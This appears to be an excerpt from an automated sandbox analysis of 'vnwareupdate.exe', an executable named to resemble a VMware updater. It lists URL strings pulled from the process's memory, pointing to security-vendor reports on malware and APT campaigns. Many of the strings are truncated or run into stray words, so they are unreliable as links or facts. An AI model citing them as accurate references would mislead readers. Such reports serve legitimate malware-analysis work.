Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/automating-intelligence-discovering-recent-plugx
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/automating-intelligence-discovering-recent-plugxDiscovering
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/automating-intelligence-discovering-recent-plugxTargeted
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/lojack-becomes-a-double-agent/8
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/lojack-becomes-a-double-agent/Bronze
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/lojack-becomes-a-double-agent/Fancy
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/peeking-at-pkybot/
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/peeking-at-pkybot/Pkybot:
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/peeking-at-pkybot/RawPOS
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://attack.mitre.org/wiki/Software/S0142
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://attack.mitre.org/wiki/Software/S0142APT10
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://attack.mitre.org/wiki/Software/S0142New
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20R
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20RPitty
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20RRSA
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20RUnmasking
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareDarkhotel
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/downloaders-on-google-play-spreading-malware-to-steal-fac
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/downloaders-on-google-play-spreading-malware-to-steal-fac6B6E023B4221BAE8ED37
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/downloaders-on-google-play-spreading-malware-to-steal-facDownloaders
Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-t
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-tCerber
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-tH
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-tNew
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customers
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customers-The
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customersSThe
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customerseThe
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customersuRetefe
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.bit9.com/2015/09/04/threat-research-team-goes-beyond-the-exploit-in
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.bit9.com/2015/09/04/threat-research-team-goes-beyond-the-exploit-inFrom
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.bit9.com/2015/09/04/threat-research-team-goes-beyond-the-exploit-inPayloads
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://blog.comodo.com/comodo-news/comodo-protects-five-universities-new-malwar
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.comodo.com/comodo-news/comodo-protects-five-universities-new-malwarTrojan.DarkLoader
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.comodo.com/comodo-news/comodo-warns-android-users-of-tordow-v2-0-ou
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.comodo.com/comodo-news/comodo-warns-android-users-of-tordow-v2-0-ou4Tordow
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.comodo.com/comodo-news/comodo-warns-android-users-of-tordow-v2-0-ouContinued
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.comodo.com/comodo-news/comodo-warns-android-users-of-tordow-v2-0-ouTordow
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyber4sight.com/2017/02/technical-analysis-watering-hole-attacks-ag
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyber4sight.com/2017/02/technical-analysis-watering-hole-attacks-agAnalysis
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyber4sight.com/2017/02/technical-analysis-watering-hole-attacks-agOperation
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyber4sight.com/2017/02/technical-analysis-watering-hole-attacks-agtRecent
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/an-introduction-to-alphalocker
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companiesDigitally
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companiesThe
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/graftor-variant-leveraging-signed-microsoft-executable
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/grand-theft-auto-panda
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/grand-theft-auto-pandaThe
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/petya-returns-as-goldeneye-strikes-germany
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/petya-returns-as-goldeneye-strikes-germany.
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/petya-returns-as-goldeneye-strikes-germany8
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/petya-returns-as-goldeneye-strikes-germanyDridex
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/petya-returns-as-goldeneye-strikes-germanyPetya
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radarShell
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radarTick
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cylance.com/the-ghost-dragon
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyveillance.com/widespread-malspam-campaign-delivering-locky-ransom
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyveillance.com/widespread-malspam-campaign-delivering-locky-ransomChina-based
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.cyveillance.com/widespread-malspam-campaign-delivering-locky-ransomWidespread
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.eset.ie/2016/09/01/torrentlocker-crypto-ransomware-still-active-usi
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2016/06/14/obfuscated-bitcoin-miner-propagates-through
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2016/07/25/insights-on-torrentlocker
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2016/11/02/the-angry-spam-and-the-tricky-macro-deliver
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2016/11/02/the-angry-spam-and-the-tricky-macro-deliverHancitor
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2016/11/28/a-new-all-in-one-botnet-proteus
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizati
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbot
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbotA
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbotRecent
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/20/evasive-malware-campaign-abuses-free-cloud-
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/20/evasive-malware-campaign-abuses-free-cloud-Evasive
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/20/evasive-malware-campaign-abuses-free-cloud-Malware
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/09/20/evasive-malware-campaign-abuses-free-cloud-Operation
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/12/pdf-phishing-leads-to-nanocore-rat-targets-
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/12/pdf-phishing-leads-to-nanocore-rat-targets-6PDF
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/12/pdf-phishing-leads-to-nanocore-rat-targets-diPDF
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/29/evasive-sage-2-2-ransomware-variant-targets
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/29/evasive-sage-2-2-ransomware-variant-targetsBadRabbit
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/29/evasive-sage-2-2-ransomware-variant-targetsEvasive
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/10/29/evasive-sage-2-2-ransomware-variant-targetsdcc6;APTnotes
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitc
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitc7A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitc9A
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcaA
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcaMaster
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcgA
Source: vnwareupdate.exe, 00000003.00000002.516989975.00000000021F1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2018/02/21/omg-mirai-based-bot-turns-iot-devices-into-
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2018/02/21/omg-mirai-based-bot-turns-iot-devices-into-Emissary
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/2018/02/21/omg-mirai-based-bot-turns-iot-devices-into-New
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/post/over-100-000-south-korean-users-affected-by-black
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/post/over-100-000-south-korean-users-affected-by-blackSouth
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fortinet.com/post/over-100-000-south-korean-users-affected-by-blackTunnel
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fox-it.com/2017/04/14/a-mole-exposing-itself-to-sunlight/
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fox-it.com/2017/04/14/a-mole-exposing-itself-to-sunlight/A
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/Operation
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/Snake:
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/2014/02/23968-uroburos-highly-complex-espionage-s
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/2014/11/23937-the-uroburos-case-new-sophisticated
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/2015/01/23927-evolution-of-sophisticated-spyware-
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/2015/01/23927-evolution-of-sophisticated-spyware-l
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/new-dridex-infection-vector-identifi
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/new-dridex-infection-vector-identifiAngler
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/new-dridex-infection-vector-identifiNew
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/new-dridex-infection-vector-identifiSofacy
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/the-andromedagamarue-botnet-is-on-th
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/the-andromedagamarue-botnet-is-on-thAndromeda
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/the-andromedagamarue-botnet-is-on-thThe
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.gdatasoftware.com/blog/article/the-andromedagamarue-botnet-is-on-thaAndromeda
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.korumail.com/cyber-security/french-commercial-proposal-malware/
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/cybercrime/2016/10/get-your-rat-on-pastebin/
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/cybercrime/2017/01/the-curious-case-of-a-sundown-e
Source: vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptominin
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomininTNewly
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/cybercrime/exploits/2016/08/malvertising-campaign-
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-docShakti
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-docShell
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-docTordow
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disg
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disgCmstar
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disgKorplug
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/04/usps-themed-malspam-now-de
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/08/cerber-ransomware-delivere00OilRig
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/08/cerber-ransomware-delivereOilRig
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-anti
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-antiCarbanak
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-antiLocky
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-antiNb
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heaven
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavenA
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavenMalicious
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experimen
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experimenDrive-by
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experimenMalware
